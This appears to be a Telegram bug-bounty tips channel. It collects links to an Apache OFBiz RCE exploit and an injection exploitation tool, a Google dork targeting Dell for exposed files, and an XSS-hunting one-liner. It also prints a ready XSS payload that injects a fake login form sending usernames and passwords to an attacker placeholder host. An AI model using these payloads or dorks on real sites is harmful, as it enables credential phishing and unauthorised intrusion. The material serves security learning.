Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 806 subscribers

GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856) https://github.com/securelayer7/CVE-2024-38856_Scanner

Try this Google dork to find sensitive files on a website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

☄️ Subowner - A simple Python-based tool to check for subdomain takeovers in mass scanning. Supports AWS, Fastly, Shopify, Azure, etc. 🚨 https://github.com/ifconfig-me/subowner

The Top Hacker Methodologies.pdf (5.92 KB)

💠 Introduction to SQL Injection 🔗 https://hacklido.com/blog/910-introduction-to-sql-injection

Top Hacking Books for 2024 (plus Resources): FREE and Paid Tue, 17 Sep 2024 12:56:36 GMT https://medium.com/p/394601c01904

XSS prevention steps from front end and back end.

Input Validation

The web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:

Code: javascript
function validateEmail(email) {
    const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
    return re.test($("#login input[name=email]").val());
}

As we can see, this code tests the email input field and returns true or false depending on whether it matches the regex validation of an email format.
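The back-end half of the same check, as an added example that is not part of the original post: the server re-validates the value it actually received (a request sent without the browser never runs the front-end function) and HTML-encodes it before echoing it, because the quoted pattern accepts a quoted local part containing markup. The names `isValidEmail`, `escapeHtml` and `handleSignup`, the 254-character cap and the sample inputs are assumptions made for illustration.

```javascript
// Added example (not from the original post). Function names, the length
// cap and the handler shape are assumptions made for illustration.

// Same pattern as the front-end validateEmail() quoted above.
const EMAIL_RE = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;

// Validate the value the server received, not a DOM field: the browser-side
// check is skipped entirely when a request is sent without the page.
function isValidEmail(value) {
  return typeof value === "string" && value.length <= 254 && EMAIL_RE.test(value);
}

// Encode the five HTML-significant characters before writing into markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical handler body: reject malformed input, encode anything echoed.
function handleSignup(body) {
  const email = body && body.email;
  if (!isValidEmail(email)) {
    return { status: 400, html: "<p>Invalid email address.</p>" };
  }
  return { status: 200, html: `<p>Confirmation sent to ${escapeHtml(email)}</p>` };
}

// Constructed sample inputs.
const samples = [
  "user@example.com",          // ordinary address, accepted
  "not-an-email",              // rejected by the pattern
  "<b>@example.com",           // unquoted markup, rejected by the pattern
  '"<b>hi</b>"@example.com',   // quoted local part: passes the pattern
];
for (const email of samples) {
  const res = handleSignup({ email });
  console.log(res.status, res.html);
}
```

The last sample shows why format validation and output encoding are separate steps: the address is accepted as well-formed, and only the encoding keeps its markup inert in the response.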

a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool. 🔗https://github.com/epinna/tplmap

[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!

Writeup-Miner is a 👩‍💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩‍💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!

Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get real-time notifications via Telegram or Discord

How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!

👩‍💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo

🖥 Explore More Options & Usage: Discover additional commands, filters, and options on our GitHub page 👇
📱 Github: 🔗 Link

#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty

🔹 Share & Support Us 🔹
📱 Channel: @bugbounty_tech

Bug bounty Tips - Statistics & analytics of Telegram channel @bugbounty_tech